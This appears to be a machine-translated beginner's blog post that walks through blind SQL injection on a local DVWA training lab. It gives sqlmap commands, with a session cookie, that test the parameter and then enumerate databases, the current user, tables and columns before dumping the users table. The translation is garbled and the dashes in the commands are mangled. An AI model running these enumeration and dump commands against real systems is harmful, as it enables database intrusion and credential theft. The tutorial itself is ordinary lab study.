My way of learning, now 0 basis, is a small white, please daniel criticism! Write down this article, is a thought of their own collation, for reference only.
Dvwa Login, first in Dvwa Security set a level of low, and then into SQL injection (blind), randomly enter a number to grab the packet, and then find URL injection points and cookies. (the tool used for grasping the package is fiddler, so we don't go into the details of the packet capture process.)
650) this.width=650; "Src=" https://s2.51cto.com/wyfs02/M01/9B/8A/wKiom1lkUy_wK7csAABEXRSel14372.png-wh_500x0-wm_ 3-wmp_4-s_678261990.png "title=" 1.png "alt=" Wkiom1lkuy_wk7csaabexrsel14372.png-wh_50 "/>
then enter cmd interface for command parameter input:
The first step is to query the if the URL can be injected, the command parameters are as follows:
Sqlmap.py–u "http://localhost/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#"--cookie= "security=low; Phpsessid=9gakv1caa8u351290s6bupeqt6 "
-u parameter is the specified URL--cookie= "Cookie value"
650) this.width=650; "Src=" https://s1.51cto.com/wyfs02/M01/9B/8A/wKioL1lkU03w2lo7AACnw55E1CY556.png-wh_500x0-wm_ 3-wmp_4-s_2080954333.png "title=" 2.png "alt=" Wkiol1lku03w2lo7aacnw55e1cy556.png-wh_50 "/>
The results were found to be injected.
The second step is to view all the databases:
Sqlmap.py–u "http://localhost/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#"--cookie= "security=low; Phpsessid=9gakv1caa8u351290s6bupeqt6 "–dbs
650) this.width=650; "Src=" https://s1.51cto.com/wyfs02/M00/9B/8A/wKiom1lkU3bhCRGtAAA4WHZ7tIA131.png-wh_500x0-wm_ 3-wmp_4-s_3494656188.png "title=" 3.png "alt=" Wkiom1lku3bhcrgtaaa4whz7tia131.png-wh_50 "/>
The third step is to view the current user:
Sqlmap.py–u "http://localhost/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#"--cookie= "security=low; Phpsessid=9gakv1caa8u351290s6bupeqt6 "–current-user
650) this.width=650; "Src=" https://s4.51cto.com/wyfs02/M00/9B/8A/wKioL1lkV3bTnOlbAAAdo4eciTY066.png-wh_500x0-wm_ 3-wmp_4-s_630102404.png "title=" 4.png "alt=" Wkiol1lkv3btnolbaaado4ecity066.png-wh_50 "/>
The Fourth step is to view all the tables in the database DVWA:
Sqlmap.py–u "http://localhost/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#"--cookie= "security=low; Phpsessid=9gakv1caa8u351290s6bupeqt6 "–D Dvwa--tables
650) this.width=650; "Src=" https://s2.51cto.com/wyfs02/M01/9B/8A/wKiom1lkV5fi1YA9AAAubDfkaAI056.png-wh_500x0-wm_ 3-wmp_4-s_4084334908.png "title=" 5.png "alt=" Wkiom1lkv5fi1ya9aaaubdfkaai056.png-wh_50 "/>
Fifth step to view the users table in the database , where -columns is the view of all columns of the current table
Sqlmap.py–u "http://localhost/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#"--cookie= "security=low; Phpsessid=9gakv1caa8u351290s6bupeqt6 "–D dvwa–t users--columns
650) this.width=650; "Src=" https://s4.51cto.com/wyfs02/M01/9B/8A/wKioL1lkV62ifCcVAAA6vNc0LrM218.png-wh_500x0-wm_ 3-wmp_4-s_3671177600.png "title=" 6.png "alt=" Wkiol1lkv62ifccvaaa6vnc0lrm218.png-wh_50 "/>
everyone through the previous steps are not waiting for patience, haha, but the results come out, or there is a sense of accomplishment oh. The sixth step, the last step,--dump the information for all columns.
Sqlmap.py–u "http://localhost/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#"--cookie= "security=low; Phpsessid=9gakv1caa8u351290s6bupeqt6 "–D dvwa–t users--dump
650) this.width=650; "Src=" https://s3.51cto.com/wyfs02/M02/9B/8A/wKiom1lkV8iyNQ-jAAAuNgnwynM691.png-wh_500x0-wm_ 3-wmp_4-s_320319171.png "title=" 7.png "alt=" Wkiom1lkv8iynq-jaaaungnwynm691.png-wh_50 "/>
Of course, the last picture does not cut into a complete picture oh, you can continue to enter the!!
This article is from the "learning Journey Ideas to organize" blog, please be sure to keep this source http://pieshusheng.blog.51cto.com/13106113/1946399
My Way of Learning (a) SQL blind learning article